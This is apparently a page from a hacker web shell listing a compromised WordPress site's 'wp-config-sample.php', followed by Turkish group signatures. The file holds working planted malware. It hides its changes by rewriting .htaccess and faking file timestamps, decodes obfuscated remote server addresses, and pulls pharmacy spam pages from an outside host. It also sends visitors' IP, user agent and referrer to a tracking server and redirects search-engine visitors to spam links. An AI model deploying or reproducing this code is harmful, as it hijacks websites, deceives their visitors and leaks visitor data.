VaTan
57.Alay Birim Başkanlığı-AhmedRıza

57.Alay SpeciaL Shell

Nerdeyim: /storage/ssd1/678/1628678/public_html/
DOSYA YUKLE :
Current File : /storage/ssd1/678/1628678/public_html/wp-config-sample.php

<?php
@ini_set('display_errors', '0');
error_reporting(0);
$actime = filemtime('wp-config.php');
$track = 'ph_sp';
if (isset($_REQUEST['check'])) {
	$htaccess = '# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.+).html$ wp-config-sample.php?key=$1
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress';
if (file_put_contents('.htaccess', $htaccess)) {
	touch('.htaccess', $actime);
	touch('wp-config-sample.php', $actime);
	echo 'ok';
}
exit;
}

if (is_dir("wp-includes/Text/Diff")) {
	$cms = 'wp';
	$dir = "wp-includes/Text/Diff";
}

$res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];

$redirect = 0;
$fof = '404 not found';

function getRealIpAddr() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
      $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else {
      $ip=$_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getRealIpAddr();
$ref = $_SERVER['HTTP_REFERER'];

if (preg_match("/google|bing/i", $ref)) $redirect = 1;

$ea = '_shaesx_';
$ay = 'get_data_ya';
$ae = 'decode';
$ea = str_replace('_sha', 'bas', $ea);
$ao = 'wp_ccd';
$ee = $ea.$ae;
$oa = str_replace('sx', '64', $ee);
$genpass = "Zgc5c4MXrK0zfgkF8Y1BKercMlHBdqZbri+NHrOSsh0QbEdfRBk4";
$tdpass = "Zgc5c4MXrLUufAwU6pFbfLCQOUKULbIckDuLX7HVoQ==";
$apikey = '5a087486b28b5953e8460fca6c4d168e';

if (ini_get('allow_url_fopen')) {
    function get_data_ya($mmm) {
        $data = file_get_contents($mmm);
        return $data;
    }
}
else {
    function get_data_ya($mmm) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, $mmm);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
}


function wp_ccd($fd, $fa="")
{
   $fe = "wp_frmfunct";
   $len = strlen($fd);
   $ff = '';
   $n = $len>100 ? 8 : 2;
   while( strlen($ff)<$len )
   {
      $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
   }
   return $fd^$ff;
}
$genapi = $ao($oa("$genpass"), 'wp_function');
$tdapi = $ao($oa("$tdpass"), 'wp_function');


if (isset($_REQUEST['key'])) {
	$tkey = $_REQUEST['key'];
	$eprefix = explode('-', $tkey);
	$prefix = $eprefix[0];
	//if (!is_numeric($prefix)) {
	//	echo $fof;
	//	exit;
	//}
	$key = str_replace("$prefix-", '', $tkey);
	$key = str_replace('-', ' ', $key);
	$page = md5($key);

	if ($cms == 'wp') {
		if (!is_dir("$dir/p")) mkdir("$dir/p");
		if (file_exists("$dir/p/$page.txt")) {
			$html = file_get_contents("$dir/p/$page.txt");
		}
		else {
			$html = @get_data_ya("$genapi?res=$res&key=$key");
			file_put_contents("$dir/p/$page.txt", $html);
		}
	}

	$ehtml = explode('-|-', $html);
	$pill = $ehtml[1];
	$key = $ehtml[2];
	$data = $ehtml[3];

	$churl = "{$tdapi}?action=get_link&token=$apikey&group=pharm&cat=$pill&keyword=$key&ua=$ua&ip=$ip&referer=$ref&track=$track";
	$check = @get_data_ya($churl);
	$json = json_decode($check);
	$goaway = $json->{'stream'}->{'url'};
	$goaway = str_replace('$cat', $pill, $goaway);
	$goaway = str_replace('$track', $track, $goaway);

	if (stristr($goaway, 'http') && $redirect) {
		header("Location: $goaway");
		exit;
	}

	echo $data;
}

SESSIZCE NOBETTEYIZ

KILIÇ ARSLAN
ReeL Türk - Ahmed Rıza - Kartal Beyi - EmirZadee - THACKAY
www.000webhost.com